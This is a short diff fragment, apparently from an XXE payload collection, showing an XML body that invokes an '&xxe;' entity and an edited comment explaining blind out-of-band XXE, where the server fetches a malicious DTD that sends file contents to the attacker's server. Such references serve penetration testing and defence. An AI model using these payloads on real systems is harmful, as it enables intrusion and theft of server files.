 <root>&xxe;</root>

-<!-- Blind XXE via Out-of-Band (OOB) — when nothing is reflected in the response.
+<!-- Blind XXE via Out-of-Band — when nothing is reflected in the response.

-The server fetches your malicious DTD, which instructs it to exfiltrate
+The server fetches your malicious DTD, which exfiltrates file contents to your server. -->

 <?xml version="1.0"?>